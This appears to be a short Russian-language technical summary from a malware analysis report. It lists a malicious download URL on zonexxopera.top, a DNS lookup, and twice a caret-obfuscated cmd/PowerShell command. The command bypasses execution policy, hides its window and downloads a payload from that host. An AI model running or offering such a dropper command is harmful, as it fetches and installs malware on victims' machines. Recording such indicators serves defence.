Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ER^Sh^ELl.Exe ^-EXe^cut^Io^NPoLiCy^ ByPASs ^-no^PR^OFiLE^ -wI^nD^OwSTY^LE ^H^i^dDe^n (new^-Obj^Ect^ sYste^m^.NEt.weBclie^N^T).^DO^w^NloADf^iLE('http://zonexxopera.top/...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "POW^ER^Sh^ELl.Exe ^-EXe^cut^Io^NPoLiCy^ ByPASs ^-no^PR^OFiLE^ -wI^nD^OwSTY^LE ^H^i^dDe^n (new^-Obj^Ect^ sYste^m^.NEt.weBclie^N^T).^DO^w^NloADf^iLE('http://zonexxopera.top/...' (со скрытым окном)